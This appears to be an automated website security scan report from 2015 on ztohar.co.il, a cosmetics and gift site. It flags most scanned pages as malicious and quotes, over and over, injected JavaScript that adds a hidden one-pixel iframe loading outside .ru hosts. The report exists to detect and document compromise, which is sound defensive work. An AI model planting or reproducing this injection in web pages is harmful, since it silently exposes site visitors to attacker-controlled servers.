Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ztohar.co.il
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ztohar.co.il/ | HTTP/1.1 200 OK Date: Wed, 07 Jan 2015 18:49:07 GMT Accept-Ranges: bytes ETag: "cf849c4e4614ce1:91f" Server: BEAST Content-Length: 12135 Content-Location: http://ztohar.co.il/default.html Content-Type: text/html Last-Modified: Tue, 26 Feb 2013 17:25:43 GMT X-Powered-By: ASP.NET | clean |
http://ztohar.co.il/default.html | 200 OK Content-Length: 12135 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/tattoo.htm | 200 OK Content-Length: 16540 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/StageCosmetics.htm | 200 OK Content-Length: 16646 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/ButieCosmetics.htm | 200 OK Content-Length: 16014 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/Originalgift.htm | 200 OK Content-Length: 17819 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/Wallart.htm | 200 OK Content-Length: 16173 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/Standcreation.htm | 200 OK Content-Length: 16781 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/Birthdays.htm | 200 OK Content-Length: 14750 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/about-us.html | 200 OK Content-Length: 15826 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/WorksBag.htm | 200 OK Content-Length: 15114 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/Catalog.htm | 200 OK Content-Length: 31637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/contact.aspx | 200 OK Content-Length: 18061 Content-Type: text/html | clean |
http://ztohar.co.il/Scripts/adminScripts.js | 200 OK Content-Length: 2908 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); }})(); Antivirus reports:
| ||
http://ztohar.co.il/catalog.htm | 200 OK Content-Length: 31637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var scgkc = document.createElement('iframe'); scgkc.src = 'http://yxhyqfeb.ru/count4.php'; scgkc.style.position = 'absolute'; scgkc.style.border = '0'; scgkc.style.height = '1px'; scgkc.style.width = '1px'; scgkc.style.left = '1px'; scgkc.style.top = '1px'; if (!document.getElementById('scgkc')) { document.write('<div id=\'scgkc\'></div>'); document.getElementById('scgkc').appendChild(scgkc); }})(); Antivirus reports:
| ||
http://ztohar.co.il/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ztohar.co.il
Result:
HTTP/1.1 200 OK
Date: Wed, 07 Jan 2015 18:49:07 GMT
Accept-Ranges: bytes
ETag: "cf849c4e4614ce1:91f"
Server: BEAST
Content-Length: 12135
Content-Location: http://ztohar.co.il/default.html
Content-Type: text/html
Last-Modified: Tue, 26 Feb 2013 17:25:43 GMT
X-Powered-By: ASP.NET
...12135 bytes of data.
GET / HTTP/1.1
Host: ztohar.co.il
Result:
HTTP/1.1 200 OK
Date: Wed, 07 Jan 2015 18:49:07 GMT
Accept-Ranges: bytes
ETag: "cf849c4e4614ce1:91f"
Server: BEAST
Content-Length: 12135
Content-Location: http://ztohar.co.il/default.html
Content-Type: text/html
Last-Modified: Tue, 26 Feb 2013 17:25:43 GMT
X-Powered-By: ASP.NET
...12135 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ztohar.co.il
Referer: http://www.google.com/search?q=ztohar.co.il
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ztohar.co.il
Referer: http://www.google.com/search?q=ztohar.co.il
Result:
The result is similar to the first query. There are no suspicious redirects found.